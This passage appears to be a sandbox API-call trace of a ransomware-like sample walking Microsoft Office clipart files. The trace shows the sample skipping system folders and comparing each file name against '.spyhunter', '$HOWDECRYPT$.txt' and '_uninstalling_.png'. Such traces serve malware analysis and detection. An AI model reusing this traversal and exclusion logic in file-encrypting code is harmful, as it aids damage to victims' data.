Volume Information") returned -1 [0098.170] lstrlenW (lpString="System Volume Information") returned 25 [0098.170] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 67 [0098.170] StrStrIW (lpFirst="J0102762.WMF", lpSrch=".spyhunter") returned 0x0 [0098.170] lstrcmpW (lpString1="J0102762.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.170] lstrcmpW (lpString1="J0102762.WMF", lpString2="_uninstalling_.png") returned 1 [0098.170] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 67 [0098.170] GetProcessHeap () returned 0x2c0000 [0098.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390ed0 [0098.170] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2330) returned 0x2c16890 [0098.170] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.170] lstrcmpiW (lpString1="J0102984.WMF", lpString2="Windows") returned -1 [0098.170] lstrlenW (lpString="Windows") returned 7 [0098.170] lstrcmpiW (lpString1="J0102984.WMF", lpString2="$Recycle.bin") returned 1 [0098.170] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.171] lstrcmpiW (lpString1="J0102984.WMF", lpString2="System Volume Information") returned -1 [0098.171] lstrlenW (lpString="System Volume Information") returned 25 [0098.171] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 67 [0098.171] StrStrIW (lpFirst="J0102984.WMF", lpSrch=".spyhunter") returned 0x0 [0098.171] lstrcmpW (lpString1="J0102984.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.171] lstrcmpW (lpString1="J0102984.WMF", lpString2="_uninstalling_.png") returned 1 [0098.171] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 67 [0098.171] GetProcessHeap () returned 0x2c0000 [0098.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12fd0 [0098.171] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2338) returned 0x2c16890 [0098.171] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.171] lstrcmpiW (lpString1="J0103058.WMF", lpString2="Windows") returned -1 [0098.171] lstrlenW (lpString="Windows") returned 7 [0098.171] lstrcmpiW (lpString1="J0103058.WMF", lpString2="$Recycle.bin") returned 1 [0098.171] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.171] lstrcmpiW (lpString1="J0103058.WMF", lpString2="System Volume Information") returned -1 [0098.171] lstrlenW (lpString="System Volume Information") returned 25 [0098.171] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 67 [0098.171] StrStrIW (lpFirst="J0103058.WMF", lpSrch=".spyhunter") returned 0x0 [0098.171] lstrcmpW (lpString1="J0103058.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.171] lstrcmpW (lpString1="J0103058.WMF", lpString2="_uninstalling_.png") returned 1 [0098.171] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 67 [0098.172] GetProcessHeap () returned 0x2c0000 [0098.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38ad58 [0098.172] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2340) returned 0x2c16890 [0098.172] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.172] lstrcmpiW (lpString1="J0103262.WMF", lpString2="Windows") returned -1 [0098.172] lstrlenW (lpString="Windows") returned 7 [0098.172] lstrcmpiW (lpString1="J0103262.WMF", lpString2="$Recycle.bin") returned 1 [0098.172] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.172] lstrcmpiW (lpString1="J0103262.WMF", lpString2="System Volume Information") returned -1 [0098.172] lstrlenW (lpString="System Volume Information") returned 25 [0098.172] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 67 [0098.172] StrStrIW (lpFirst="J0103262.WMF", lpSrch=".spyhunter") returned 0x0 [0098.173] lstrcmpW (lpString1="J0103262.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.173] lstrcmpW (lpString1="J0103262.WMF", lpString2="_uninstalling_.png") returned 1 [0098.173] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 67 [0098.174] GetProcessHeap () returned 0x2c0000 [0098.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389238 [0098.174] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2348) returned 0x2c16890 [0098.174] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.174] lstrcmpiW (lpString1="J0103402.WMF", lpString2="Windows") returned -1 [0098.174] lstrlenW (lpString="Windows") returned 7 [0098.174] lstrcmpiW (lpString1="J0103402.WMF", lpString2="$Recycle.bin") returned 1 [0098.174] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.174] lstrcmpiW (lpString1="J0103402.WMF", lpString2="System Volume Information") returned -1 [0098.174] lstrlenW (lpString="System Volume Information") returned 25 [0098.174] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 67 [0098.174] StrStrIW (lpFirst="J0103402.WMF", lpSrch=".spyhunter") returned 0x0 [0098.174] lstrcmpW (lpString1="J0103402.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.174] lstrcmpW (lpString1="J0103402.WMF", lpString2="_uninstalling_.png") returned 1 [0098.174] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 67 [0098.174] GetProcessHeap () returned 0x2c0000 [0098.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c7a8 [0098.174] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2350) returned 0x2c16890 [0098.174] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.174] lstrcmpiW (lpString1="J0103812.WMF", lpString2="Windows") returned -1 [0098.174] lstrlenW (lpString="Windows") returned 7 [0098.175] lstrcmpiW (lpString1="J0103812.WMF", lpString2="$Recycle.bin") returned 1 [0098.175] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.175] lstrcmpiW (lpString1="J0103812.WMF", lpString2="System Volume Information") returned -1 [0098.175] lstrlenW (lpString="System Volume Information") returned 25 [0098.175] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 67 [0098.175] StrStrIW (lpFirst="J0103812.WMF", lpSrch=".spyhunter") returned 0x0 [0098.175] lstrcmpW (lpString1="J0103812.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.175] lstrcmpW (lpString1="J0103812.WMF", lpString2="_uninstalling_.png") returned 1 [0098.175] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 67 [0098.175] GetProcessHeap () returned 0x2c0000 [0098.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c878 [0098.175] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2358) returned 0x2c16890 [0098.175] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.175] lstrcmpiW (lpString1="J0103850.WMF", lpString2="Windows") returned -1 [0098.175] lstrlenW (lpString="Windows") returned 7 [0098.175] lstrcmpiW (lpString1="J0103850.WMF", lpString2="$Recycle.bin") returned 1 [0098.175] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.175] lstrcmpiW (lpString1="J0103850.WMF", lpString2="System Volume Information") returned -1 [0098.175] lstrlenW (lpString="System Volume Information") returned 25 [0098.175] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 67 [0098.175] StrStrIW (lpFirst="J0103850.WMF", lpSrch=".spyhunter") returned 0x0 [0098.176] lstrcmpW (lpString1="J0103850.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.176] lstrcmpW (lpString1="J0103850.WMF", lpString2="_uninstalling_.png") returned 1 [0098.176] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 67 [0098.176] GetProcessHeap () returned 0x2c0000 [0098.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c948 [0098.176] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2360) returned 0x2c16890 [0098.176] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.176] lstrcmpiW (lpString1="J0105230.WMF", lpString2="Windows") returned -1 [0098.176] lstrlenW (lpString="Windows") returned 7 [0098.176] lstrcmpiW (lpString1="J0105230.WMF", lpString2="$Recycle.bin") returned 1 [0098.176] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.176] lstrcmpiW (lpString1="J0105230.WMF", lpString2="System Volume Information") returned -1 [0098.176] lstrlenW (lpString="System Volume Information") returned 25 [0098.176] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 67 [0098.176] StrStrIW (lpFirst="J0105230.WMF", lpSrch=".spyhunter") returned 0x0 [0098.176] lstrcmpW (lpString1="J0105230.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.176] lstrcmpW (lpString1="J0105230.WMF", lpString2="_uninstalling_.png") returned 1 [0098.176] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 67 [0098.176] GetProcessHeap () returned 0x2c0000 [0098.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38ca18 [0098.176] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2368) returned 0x2c16890 [0098.177] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.177] lstrcmpiW (lpString1="J0105232.WMF", lpString2="Windows") returned -1 [0098.177] lstrlenW (lpString="Windows") returned 7 [0098.177] lstrcmpiW (lpString1="J0105232.WMF", lpString2="$Recycle.bin") returned 1 [0098.177] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.177] lstrcmpiW (lpString1="J0105232.WMF", lpString2="System Volume Information") returned -1 [0098.177] lstrlenW (lpString="System Volume Information") returned 25 [0098.177] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 67 [0098.177] StrStrIW (lpFirst="J0105232.WMF", lpSrch=".spyhunter") returned 0x0 [0098.177] lstrcmpW (lpString1="J0105232.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.177] lstrcmpW (lpString1="J0105232.WMF", lpString2="_uninstalling_.png") returned 1 [0098.177] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 67 [0098.177] GetProcessHeap () returned 0x2c0000 [0098.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38cae8 [0098.177] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2370) returned 0x2c16890 [0098.177] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.177] lstrcmpiW (lpString1="J0105234.WMF", lpString2="Windows") returned -1 [0098.177] lstrlenW (lpString="Windows") returned 7 [0098.177] lstrcmpiW (lpString1="J0105234.WMF", lpString2="$Recycle.bin") returned 1 [0098.177] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.177] lstrcmpiW (lpString1="J0105234.WMF", lpString2="System Volume Information") returned -1 [0098.178] lstrlenW (lpString="System Volume Information") returned 25 [0098.178] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 67 [0098.178] StrStrIW (lpFirst="J0105234.WMF", lpSrch=".spyhunter") returned 0x0 [0098.178] lstrcmpW (lpString1="J0105234.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.178] lstrcmpW (lpString1="J0105234.WMF", lpString2="_uninstalling_.png") returned 1 [0098.178] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 67 [0098.178] GetProcessHeap () returned 0x2c0000 [0098.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38cbb8 [0098.178] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2378) returned 0x2c16890 [0098.178] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.178] lstrcmpiW (lpString1="J0105238.WMF", lpString2="Windows") returned -1 [0098.178] lstrlenW (lpString="Windows") returned 7 [0098.178] lstrcmpiW (lpString1="J0105238.WMF", lpString2="$Recycle.bin") returned 1 [0098.178] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.178] lstrcmpiW (lpString1="J0105238.WMF", lpString2="System Volume Information") returned -1 [0098.178] lstrlenW (lpString="System Volume Information") returned 25 [0098.178] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 67 [0098.178] StrStrIW (lpFirst="J0105238.WMF", lpSrch=".spyhunter") returned 0x0 [0098.178] lstrcmpW (lpString1="J0105238.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.178] lstrcmpW (lpString1="J0105238.WMF", lpString2="_uninstalling_.png") returned 1 [0098.178] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 67 [0098.178] GetProcessHeap () returned 0x2c0000 [0098.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38cc88 [0098.179] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2380) returned 0x2c16890 [0098.179] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.179] lstrcmpiW (lpString1="J0105240.WMF", lpString2="Windows") returned -1 [0098.179] lstrlenW (lpString="Windows") returned 7 [0098.179] lstrcmpiW (lpString1="J0105240.WMF", lpString2="$Recycle.bin") returned 1 [0098.179] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.179] lstrcmpiW (lpString1="J0105240.WMF", lpString2="System Volume Information") returned -1 [0098.179] lstrlenW (lpString="System Volume Information") returned 25 [0098.179] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 67 [0098.179] StrStrIW (lpFirst="J0105240.WMF", lpSrch=".spyhunter") returned 0x0 [0098.179] lstrcmpW (lpString1="J0105240.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.179] lstrcmpW (lpString1="J0105240.WMF", lpString2="_uninstalling_.png") returned 1 [0098.179] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 67 [0098.179] GetProcessHeap () returned 0x2c0000 [0098.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38cd58 [0098.179] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2388) returned 0x2c16890 [0098.179] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.179] lstrcmpiW (lpString1="J0105244.WMF", lpString2="Windows") returned -1 [0098.179] lstrlenW (lpString="Windows") returned 7 [0098.180] lstrcmpiW (lpString1="J0105244.WMF", lpString2="$Recycle.bin") returned 1 [0098.180] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.180] lstrcmpiW (lpString1="J0105244.WMF", lpString2="System Volume Information") returned -1 [0098.180] lstrlenW (lpString="System Volume Information") returned 25 [0098.180] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 67 [0098.180] StrStrIW (lpFirst="J0105244.WMF", lpSrch=".spyhunter") returned 0x0 [0098.180] lstrcmpW (lpString1="J0105244.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.180] lstrcmpW (lpString1="J0105244.WMF", lpString2="_uninstalling_.png") returned 1 [0098.180] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 67 [0098.180] GetProcessHeap () returned 0x2c0000 [0098.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38ce28 [0098.180] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2390) returned 0x2c16890 [0098.180] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.180] lstrcmpiW (lpString1="J0105246.WMF", lpString2="Windows") returned -1 [0098.180] lstrlenW (lpString="Windows") returned 7 [0098.180] lstrcmpiW (lpString1="J0105246.WMF", lpString2="$Recycle.bin") returned 1 [0098.180] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.180] lstrcmpiW (lpString1="J0105246.WMF", lpString2="System Volume Information") returned -1 [0098.180] lstrlenW (lpString="System Volume Information") returned 25 [0098.180] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 67 [0098.180] StrStrIW (lpFirst="J0105246.WMF", lpSrch=".spyhunter") returned 0x0 [0098.180] lstrcmpW (lpString1="J0105246.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.181] lstrcmpW (lpString1="J0105246.WMF", lpString2="_uninstalling_.png") returned 1 [0098.181] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 67 [0098.181] GetProcessHeap () returned 0x2c0000 [0098.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38cef8 [0098.181] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2398) returned 0x2c16890 [0098.181] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.181] lstrcmpiW (lpString1="J0105250.WMF", lpString2="Windows") returned -1 [0098.181] lstrlenW (lpString="Windows") returned 7 [0098.181] lstrcmpiW (lpString1="J0105250.WMF", lpString2="$Recycle.bin") returned 1 [0098.181] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.181] lstrcmpiW (lpString1="J0105250.WMF", lpString2="System Volume Information") returned -1 [0098.181] lstrlenW (lpString="System Volume Information") returned 25 [0098.181] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 67 [0098.181] StrStrIW (lpFirst="J0105250.WMF", lpSrch=".spyhunter") returned 0x0 [0098.181] lstrcmpW (lpString1="J0105250.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.181] lstrcmpW (lpString1="J0105250.WMF", lpString2="_uninstalling_.png") returned 1 [0098.181] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 67 [0098.181] GetProcessHeap () returned 0x2c0000 [0098.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38cfc8 [0098.181] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23a0) returned 0x2c16890 [0098.182] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.182] lstrcmpiW (lpString1="J0105266.WMF", lpString2="Windows") returned -1 [0098.182] lstrlenW (lpString="Windows") returned 7 [0098.182] lstrcmpiW (lpString1="J0105266.WMF", lpString2="$Recycle.bin") returned 1 [0098.182] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.182] lstrcmpiW (lpString1="J0105266.WMF", lpString2="System Volume Information") returned -1 [0098.182] lstrlenW (lpString="System Volume Information") returned 25 [0098.182] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 67 [0098.182] StrStrIW (lpFirst="J0105266.WMF", lpSrch=".spyhunter") returned 0x0 [0098.182] lstrcmpW (lpString1="J0105266.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.182] lstrcmpW (lpString1="J0105266.WMF", lpString2="_uninstalling_.png") returned 1 [0098.182] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 67 [0098.182] GetProcessHeap () returned 0x2c0000 [0098.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d098 [0098.182] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23a8) returned 0x2c16890 [0098.182] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.182] lstrcmpiW (lpString1="J0105272.WMF", lpString2="Windows") returned -1 [0098.182] lstrlenW (lpString="Windows") returned 7 [0098.182] lstrcmpiW (lpString1="J0105272.WMF", lpString2="$Recycle.bin") returned 1 [0098.182] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.182] lstrcmpiW (lpString1="J0105272.WMF", lpString2="System Volume Information") returned -1 [0098.183] lstrlenW (lpString="System Volume Information") returned 25 [0098.183] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 67 [0098.183] StrStrIW (lpFirst="J0105272.WMF", lpSrch=".spyhunter") returned 0x0 [0098.183] lstrcmpW (lpString1="J0105272.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.183] lstrcmpW (lpString1="J0105272.WMF", lpString2="_uninstalling_.png") returned 1 [0098.183] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 67 [0098.183] GetProcessHeap () returned 0x2c0000 [0098.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d168 [0098.183] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23b0) returned 0x2c16890 [0098.183] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.183] lstrcmpiW (lpString1="J0105276.WMF", lpString2="Windows") returned -1 [0098.183] lstrlenW (lpString="Windows") returned 7 [0098.183] lstrcmpiW (lpString1="J0105276.WMF", lpString2="$Recycle.bin") returned 1 [0098.183] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.183] lstrcmpiW (lpString1="J0105276.WMF", lpString2="System Volume Information") returned -1 [0098.183] lstrlenW (lpString="System Volume Information") returned 25 [0098.183] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 67 [0098.183] StrStrIW (lpFirst="J0105276.WMF", lpSrch=".spyhunter") returned 0x0 [0098.183] lstrcmpW (lpString1="J0105276.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.183] lstrcmpW (lpString1="J0105276.WMF", lpString2="_uninstalling_.png") returned 1 [0098.184] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 67 [0098.184] GetProcessHeap () returned 0x2c0000 [0098.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d238 [0098.184] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23b8) returned 0x2c16890 [0098.184] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.184] lstrcmpiW (lpString1="J0105280.WMF", lpString2="Windows") returned -1 [0098.184] lstrlenW (lpString="Windows") returned 7 [0098.184] lstrcmpiW (lpString1="J0105280.WMF", lpString2="$Recycle.bin") returned 1 [0098.184] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.184] lstrcmpiW (lpString1="J0105280.WMF", lpString2="System Volume Information") returned -1 [0098.184] lstrlenW (lpString="System Volume Information") returned 25 [0098.184] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 67 [0098.184] StrStrIW (lpFirst="J0105280.WMF", lpSrch=".spyhunter") returned 0x0 [0098.184] lstrcmpW (lpString1="J0105280.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.184] lstrcmpW (lpString1="J0105280.WMF", lpString2="_uninstalling_.png") returned 1 [0098.184] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 67 [0098.184] GetProcessHeap () returned 0x2c0000 [0098.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d308 [0098.184] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23c0) returned 0x2c16890 [0098.184] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.184] lstrcmpiW (lpString1="J0105282.WMF", lpString2="Windows") returned -1 [0098.185] lstrlenW (lpString="Windows") returned 7 [0098.185] lstrcmpiW (lpString1="J0105282.WMF", lpString2="$Recycle.bin") returned 1 [0098.185] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.185] lstrcmpiW (lpString1="J0105282.WMF", lpString2="System Volume Information") returned -1 [0098.185] lstrlenW (lpString="System Volume Information") returned 25 [0098.185] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 67 [0098.185] StrStrIW (lpFirst="J0105282.WMF", lpSrch=".spyhunter") returned 0x0 [0098.185] lstrcmpW (lpString1="J0105282.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.185] lstrcmpW (lpString1="J0105282.WMF", lpString2="_uninstalling_.png") returned 1 [0098.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft 